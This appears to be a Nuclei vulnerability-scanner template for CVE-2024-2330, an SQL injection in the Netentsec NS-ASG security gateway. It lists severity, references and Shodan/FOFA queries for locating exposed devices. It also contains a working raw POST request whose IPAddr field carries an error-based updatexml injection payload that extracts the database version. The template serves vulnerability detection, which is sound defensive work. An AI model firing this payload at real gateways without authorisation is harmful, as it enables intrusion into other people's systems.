id: CVE-2024-2330 info: name: NS-ASG Application Security Gateway 6.3 - Sql Injection author: securityforeveryone severity: medium description: | A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330 - https://nvd.nist.gov/vuln/detail/CVE-2024-2330 - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md - https://vuldb.com/?ctiid.256281 - https://vuldb.com/?id.256281 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L cvss-score: 6.3 cve-id: CVE-2024-2330 cwe-id: CWE-89 epss-score: 0.00045 epss-percentile: 0.15866 metadata: max-request: 2 shodan-query: http.title:“NS-ASG” fofa-query: app="网康科技-NS-ASG安全网关" tags: cve,cve2024,ns-asg,sqli http: - raw: - | POST /protocol/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]} matchers: - type: dsl dsl: - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")' - 'status_code == 200' condition: and extractors: - type: regex name: version group: 1 regex: - "XPATH syntax error: '([~0-9.]+)'" # digest: 4a0a00473045022100dd56769f1200eca719df9454c9c9fd05ea386da88322f43236190beb163a313d02204e3f6924a5390d91d532af0b4bcc1ea440540b8b599520de13a902fc6524bdd2:922c64590222798bb761d5b6d8e72950